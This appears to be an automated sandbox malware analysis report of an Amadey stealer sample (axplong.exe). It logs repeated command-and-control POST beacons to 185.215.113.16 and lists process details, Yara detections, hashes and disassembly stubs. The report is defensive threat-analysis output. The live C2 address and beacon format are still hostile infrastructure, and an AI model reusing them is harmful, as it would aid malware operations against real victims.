Sep 27, 2024 19:05:58.013398886 CEST	308	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 41 46 45 41 37 34 35 43 45 46 45 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CAFEA745CEFEFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Sep 27, 2024 19:05:58.241193056 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 27 Sep 2024 17:05:58 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
49	192.168.2.4	62808	185.215.113.16	80	2672	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Sep 27, 2024 19:05:58.358745098 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 27, 2024 19:05:59.068933010 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 27 Sep 2024 17:05:58 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Sep 27, 2024 19:05:59.069833994 CEST	308	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 41 46 45 41 37 34 35 43 45 46 45 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CAFEA745CEFEFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Sep 27, 2024 19:05:59.292927980 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 27 Sep 2024 17:05:59 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
50	192.168.2.4	62809	185.215.113.16	80	2672	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Sep 27, 2024 19:05:59.405945063 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 27, 2024 19:06:00.154752970 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 27 Sep 2024 17:06:00 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Sep 27, 2024 19:06:00.197983027 CEST	308	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 41 46 45 41 37 34 35 43 45 46 45 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CAFEA745CEFEFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Sep 27, 2024 19:06:00.427018881 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 27 Sep 2024 17:06:00 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
51	192.168.2.4	62810	185.215.113.16	80	2672	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Sep 27, 2024 19:06:00.562807083 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 27, 2024 19:06:01.278086901 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 27 Sep 2024 17:06:01 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Sep 27, 2024 19:06:01.278971910 CEST	308	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 41 46 45 41 37 34 35 43 45 46 45 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CAFEA745CEFEFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Sep 27, 2024 19:06:01.509730101 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 27 Sep 2024 17:06:01 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
52	192.168.2.4	62811	185.215.113.16	80	2672	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Sep 27, 2024 19:06:01.626106024 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 27, 2024 19:06:02.344595909 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 27 Sep 2024 17:06:02 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Sep 27, 2024 19:06:02.347218990 CEST	308	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 41 46 45 41 37 34 35 43 45 46 45 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CAFEA745CEFEFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Sep 27, 2024 19:06:02.577826977 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 27 Sep 2024 17:06:02 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
53	192.168.2.4	62812	185.215.113.16	80	2672	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Sep 27, 2024 19:06:02.689042091 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 27, 2024 19:06:03.398214102 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 27 Sep 2024 17:06:03 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Sep 27, 2024 19:06:03.427120924 CEST	308	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 41 46 45 41 37 34 35 43 45 46 45 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CAFEA745CEFEFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Sep 27, 2024 19:06:03.654206991 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 27 Sep 2024 17:06:03 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
54	192.168.2.4	62813	185.215.113.16	80	2672	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Sep 27, 2024 19:06:03.815668106 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 27, 2024 19:06:04.521752119 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 27 Sep 2024 17:06:04 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
55	192.168.2.4	62814	185.215.113.16	80	2672	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Sep 27, 2024 19:06:04.531641006 CEST	308	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 41 46 45 41 37 34 35 43 45 46 45 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CAFEA745CEFEFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Sep 27, 2024 19:06:05.255327940 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 27 Sep 2024 17:06:05 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
56	192.168.2.4	62815	185.215.113.16	80	2672	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Sep 27, 2024 19:06:05.378062010 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 27, 2024 19:06:06.108616114 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 27 Sep 2024 17:06:05 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Sep 27, 2024 19:06:06.803221941 CEST	308	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 41 46 45 41 37 34 35 43 45 46 45 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CAFEA745CEFEFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Sep 27, 2024 19:06:07.038024902 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 27 Sep 2024 17:06:06 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
57	192.168.2.4	62816	185.215.113.16	80	2672	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Sep 27, 2024 19:06:07.159190893 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 27, 2024 19:06:07.860096931 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 27 Sep 2024 17:06:07 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
58	192.168.2.4	62817	185.215.113.16	80	2672	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Sep 27, 2024 19:06:07.870531082 CEST	308	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 41 46 45 41 37 34 35 43 45 46 45 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CAFEA745CEFEFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Sep 27, 2024 19:06:08.576803923 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 27 Sep 2024 17:06:08 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
59	192.168.2.4	62818	185.215.113.16	80	2672	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Sep 27, 2024 19:06:08.689546108 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 27, 2024 19:06:09.412343979 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 27 Sep 2024 17:06:09 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Target ID:	0
Start time:	13:04:01
Start date:	27/09/2024
Path:	C:\Users\user\Desktop\file.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\file.exe"
Imagebase:	0xed0000
File size:	1'949'184 bytes
MD5 hash:	572146DA15EDF1DAAC1B337A71D9A1F7
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000000.00000003.1742866019.0000000005180000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000000.00000002.1783849265.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	1
Start time:	13:04:04
Start date:	27/09/2024
Path:	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe"
Imagebase:	0xb20000
File size:	1'949'184 bytes
MD5 hash:	572146DA15EDF1DAAC1B337A71D9A1F7
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000001.00000002.1812692273.0000000000B21000.00000040.00000001.01000000.00000007.sdmp, Author: Joe Security Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000001.00000003.1771741523.0000000004920000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML Detection: 53%, ReversingLabs
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	13:04:04
Start date:	27/09/2024
Path:	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
Imagebase:	0xb20000
File size:	1'949'184 bytes
MD5 hash:	572146DA15EDF1DAAC1B337A71D9A1F7
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000002.00000003.1772376419.0000000004D40000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000002.00000002.1813406382.0000000000B21000.00000040.00000001.01000000.00000007.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	13:05:00
Start date:	27/09/2024
Path:	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
Imagebase:	0xb20000
File size:	1'949'184 bytes
MD5 hash:	572146DA15EDF1DAAC1B337A71D9A1F7
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000006.00000002.2994463490.0000000000B21000.00000040.00000001.01000000.00000007.sdmp, Author: Joe Security Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000006.00000003.2324708370.0000000005190000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	false

Show Windows behavior

Function 053A00B6 Relevance: 1.4, Strings: 1, Instructions: 105COMMON

Download Yara Rule

Strings

|"_O, xrefs: 053A013F

Memory Dump Source

Source File: 00000000.00000002.1787945297.00000000053A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 053A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_53a0000_file.jbxd

Similarity

API ID:
String ID: |"_O
API String ID: 0-3760475948
Opcode ID: 5eac684a00020fced1d357a4306efd9698cb9e94f3abec6370dc582b03b04f54
Instruction ID: 9c4379a35b56e276bd986cc7c96a408278f5d5761c2c7c6387ced65a7b147eda
Opcode Fuzzy Hash: 5eac684a00020fced1d357a4306efd9698cb9e94f3abec6370dc582b03b04f54
Instruction Fuzzy Hash: 1011BFEF14C210BEA14AC5866F9C9F76A6FE5C77307318427F44795E02E2E90A4A9132

Function 053A00C7 Relevance: 1.3, Strings: 1, Instructions: 99COMMON

Download Yara Rule

Strings

|"_O, xrefs: 053A013F

Memory Dump Source

Source File: 00000000.00000002.1787945297.00000000053A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 053A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_53a0000_file.jbxd

Similarity

API ID:
String ID: |"_O
API String ID: 0-3760475948
Opcode ID: 81c5a88bf09b44821b16d80214e70eeed0aef01c82dfb094417acb406756282e
Instruction ID: b3c81773f76d7f17f7a841d9a9b5f5a4eae9ad0dbbfca867a151883025df21fd
Opcode Fuzzy Hash: 81c5a88bf09b44821b16d80214e70eeed0aef01c82dfb094417acb406756282e
Instruction Fuzzy Hash: 541101EF04C214BEA146C5866BAD9F66A6FE5C7330B31842BF84795E02E2980A495132

Function 053A00F0 Relevance: 1.3, Strings: 1, Instructions: 89COMMON

Download Yara Rule

Strings

|"_O, xrefs: 053A013F

Memory Dump Source

Source File: 00000000.00000002.1787945297.00000000053A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 053A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_53a0000_file.jbxd

Similarity

API ID:
String ID: |"_O
API String ID: 0-3760475948
Opcode ID: e1939e5f54ea8676d5dba65c92187992c0bbe7ea95621e07b249cec24086b0fb
Instruction ID: 8122c39b601c235c455fd10ac451adb701e1e3b23faaa3163da8dad0ec0d2a90
Opcode Fuzzy Hash: e1939e5f54ea8676d5dba65c92187992c0bbe7ea95621e07b249cec24086b0fb
Instruction Fuzzy Hash: D41148EF08C210BEA54B85956B9D8F66F6FF5D7330731847AF447A1E02E2D90B495131

Function 053A00E1 Relevance: 1.3, Strings: 1, Instructions: 86COMMON

Download Yara Rule

Strings

|"_O, xrefs: 053A013F

Memory Dump Source

Source File: 00000000.00000002.1787945297.00000000053A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 053A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_53a0000_file.jbxd

Similarity

API ID:
String ID: |"_O
API String ID: 0-3760475948
Opcode ID: 8fcc641f1d1b0fe6d6da4aabba6e8e7ce555b5c3f5e1c022828b55314d23601d
Instruction ID: 99843b88903f8d58e306cbe78748afdf593990d27005e1db31bdc21318212f7b
Opcode Fuzzy Hash: 8fcc641f1d1b0fe6d6da4aabba6e8e7ce555b5c3f5e1c022828b55314d23601d
Instruction Fuzzy Hash: 081126EF04C210BEA54BC5866BAD9F67EAFE5C7330B318427F447A5E02E2D91B495132

Function 053A0161 Relevance: 1.3, Strings: 1, Instructions: 84COMMON

Download Yara Rule

Strings

|"_O, xrefs: 053A013F

Memory Dump Source

Source File: 00000000.00000002.1787945297.00000000053A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 053A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_53a0000_file.jbxd

Similarity

API ID:
String ID: |"_O
API String ID: 0-3760475948
Opcode ID: 143773cbe195ec9a3ad08f28150dbd9a201299d668eabc074819f7bac34a8e19
Instruction ID: a34f9dd747f08826e3b0f95590be21df0cbe4bf8b291614ff3777498afe1ce9f
Opcode Fuzzy Hash: 143773cbe195ec9a3ad08f28150dbd9a201299d668eabc074819f7bac34a8e19
Instruction Fuzzy Hash: CA0126EF08C210BEA54AC1966BECAF66E6FF5D77307314426F447A5E02A2980E4A6071

Function 053A0116 Relevance: 1.3, Strings: 1, Instructions: 77COMMON

Download Yara Rule

Strings

|"_O, xrefs: 053A013F

Memory Dump Source

Source File: 00000000.00000002.1787945297.00000000053A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 053A0000, based on PE: false

